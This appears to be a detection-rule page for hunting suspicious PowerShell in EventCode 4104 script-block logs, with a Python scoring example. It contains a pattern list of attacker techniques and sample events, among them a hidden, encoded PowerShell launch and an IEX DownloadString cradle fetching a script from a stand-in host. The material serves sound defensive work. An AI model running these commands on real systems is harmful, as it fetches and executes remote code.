
Summary
The PowerShell 4104 Hunting analytic identifies suspicious activity in PowerShell script execution recorded by Script Block Logging (EventCode 4104). It inspects the ScriptBlockText field for patterns and keywords associated with malicious behavior, helping SOC analysts detect PowerShell-based threats, which are common in modern attacks. Hits can reveal code execution, privilege escalation, data exfiltration, or other activity indicative of a compromised system. The rule aggregates results across multiple evaluation metrics to flag potential threats effectively. Monitoring PowerShell execution is critical for organizations because of the risks that come with such powerful scripting capabilities.
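As an added example (not the rule's own search or its pattern list), the following Python scorer applies the approach described above: it matches the ScriptBlockText of constructed EventCode 4104 records against a few assumed suspicious patterns, then aggregates the score per Computer and UserID so a host is flagged on combined evidence rather than one keyword. The patterns, weights, threshold and sample events are all assumptions for illustration.

```python
import re
from collections import Counter

# Assumed example patterns (not the analytic's own list): regexes applied to the
# lower-cased ScriptBlockText, each with a weight reflecting how often it shows
# up in abused PowerShell rather than in routine administration.
SUSPICIOUS_PATTERNS = {
    r"-enc(odedcommand)?\b": 2,                       # encoded command
    r"\biex\b|invoke-expression": 2,                  # dynamic evaluation
    r"downloadstring|downloadfile|net\.webclient": 2, # remote download
    r"-(executionpolicy|ep)\s+bypass": 1,             # policy bypass
    r"frombase64string": 1,                           # in-script decoding
    r"-nop\b|-noprofile": 1,                          # profile suppression
    r"-w(indowstyle)?\s+hidden": 1,                   # hidden window
}

# Constructed EventCode 4104 records (not real telemetry).
SAMPLE_EVENTS = [
    {"Computer": "ws01", "UserID": "alice",
     "ScriptBlockText": "Get-Service | Where-Object Status -eq 'Running'"},
    {"Computer": "ws02", "UserID": "bob",
     "ScriptBlockText": "powershell -nop -w hidden -ep bypass -enc SQBFAFgA"},
    {"Computer": "ws02", "UserID": "bob",
     "ScriptBlockText": "IEX (New-Object Net.WebClient)"
                        ".DownloadString('http://example.invalid/a.ps1')"},
]


def score_script_block(text):
    """Return (score, matched patterns) for one ScriptBlockText value."""
    lowered = text.lower()
    score, hits = 0, []
    for pattern, weight in SUSPICIOUS_PATTERNS.items():
        if re.search(pattern, lowered):
            score += weight
            hits.append(pattern)
    return score, hits


def hunt_4104(events, threshold=3):
    """Aggregate scores per (Computer, UserID); return groups at or above threshold."""
    totals, matched = Counter(), {}
    for ev in events:
        s, hits = score_script_block(ev["ScriptBlockText"])
        key = (ev["Computer"], ev["UserID"])
        totals[key] += s
        matched.setdefault(key, []).extend(hits)
    return {k: {"score": v, "patterns": sorted(set(matched[k]))}
            for k, v in totals.items() if v >= threshold}


if __name__ == "__main__":
    for key, info in hunt_4104(SAMPLE_EVENTS).items():
        print(key, info)
```

In a SIEM the same idea is expressed as a search over the 4104 events with the pattern matches as computed fields and a stats aggregation by host and user; the threshold should be tuned against the environment's baseline of legitimate administrative scripts.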
Categories
- Endpoint
- Windows
Data Sources
- Pod
- Container
- User Account
- Windows Registry
- Script
- Image
- Web Credential
ATT&CK Techniques
- T1059
- T1059.001
Created: 2025-01-27